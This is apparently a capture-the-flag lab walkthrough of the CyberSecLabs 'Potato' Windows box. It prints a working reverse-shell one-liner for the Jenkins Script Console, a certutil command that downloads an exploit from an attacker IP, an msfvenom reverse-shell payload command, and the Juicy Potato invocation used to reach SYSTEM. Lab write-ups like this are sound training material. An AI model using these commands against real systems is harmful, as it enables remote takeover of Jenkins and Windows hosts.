Windows Active Directory Privilege Escalation with Juicy Potato | Cyberseclabs Potato Walkthrough
In this post, we covered the solution of Cyberseclabs potato where we demonstrated the exploitation of a vulnerable Jenkins server and the privilege escalation using Juicy Potato on a Windows server machine.
Information Gathering and Enumeration
We start with an Nmap scan as shown below
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=Potato
| Issuer: commonName=Potato
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-15T13:18:41
| Not valid after: 2020-11-14T13:18:41
| MD5: 5de9 fd1e 4f80 54ea 9fa9 aae6 258a c579
|_SHA-1: 2f75 b9e1 723e c77c 28ed f9dd 25eb 3d7f dd52 3c87
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49163/tcp open msrpc Microsoft Windows RPC
49164/tcp open msrpc Microsoft Windows RPCSince this is a Windows system, we may safely disregard the open Microsoft RPC ports. We can also check off winRM ports 5985 and 47001 from the list because they are open on all CSL boxes and are only useful for post-exploitation. The samba ports (139+445), 8080, and 3389 are all that are left. SMB tells us that we need credentials in order to perform anything. I skipped 3389 altogether and went right for 8080. It appears that anything hosted on 8080 is the best option.
Jenkins Server Exploitation
Because of a certain feature, having access to a Jenkins dashboard essentially ensures us a shell (spoiler alert: access to jenkins dashboard = RCE). The Manage Jenkins option, which can be located in the dashboard’s left corner, contains this feature.
Upon exploring the Manage Jenkins page, we discover the Script Console feature.
We can generate a reverse shell that works on the script console of Jenkins server using the below:
String host="localhost";int port=4545;String cmd="cmd.exe";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
With the listener running on the attacker machine, executing the above in Jenkins server will serve you the first foothold.
Windows Privilege Escalation and Post Exploitation Using Juicy Potato and Token Impersonation
To acquire root on this instance of Windows machine, we just need to perform some basic enumeration. We should first check our permissions and then quickly glance at the kernel to see if any hotfixes are available.
Systeminfo doesn’t provide any meaningful information, but whoami /priv gives us a rather good result.
It is evident from the whoami /priv output that the SeImpersonatePrivilege is enabled. This implies that we can execute commands as the user of our choosing, so long as we can impersonate them, by using an impersonation attack, sometimes known as a ” juicy potato attack” as suggested by the term of the technique. Let’s first ascertain what is truly happening and how to mimic another user before moving on to do so.
As the name suggests, a token impersonation attack can be used to pretend to be a user. This approach allows us to move from the machine’s lowest user to the highest account — SYSTEM in a Windows system.
It would be outside the purview of this article to explain the inner workings of this exploit because it would require a deep dive into Windows API and a few very sophisticated windows attack techniques.
An explanation of the attack may be found here, if you’re interested in learning more. All we need to know about this box is that, with the right token, we may use this attack to assume the identity of any other user. However, in order for this attack to be effective, we also need the SeImpersonatePrivilege priv.
The juicy potato exploit can be found here.
We can upload this to the Windows box using the below command executed on the target Windows machine:
PS C:\Users> certutil -urlcache -split -f http://10.10.14.4/jp.exe
PS C:\Users> jp.exeTo pass the * for this opt, we’ll need to provide it a way to try creating the process call. We’ll try both. Next, we’ll choose a port and assign it to a listener after opening it. Since the exploit is meant to target SYSTEM, we don’t need to specify a token in order to impersonate. Giving it something to work with the permissions we’ll be impersonating is the last thing we need to do (the token is that CLSID).
Lets start by creating a payload using Msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=4545 -f exe -o shell.exeSimilar to how we transferred the Juicy Potato exploit to the target machine, we can do the same for shell.exe.
Then we combine both the shell and the exploit in one command:
PS C:\Users>jp.exe -t * -p shell.exe -l 4545And by doing so, you should receive an elevated shell in your listener.
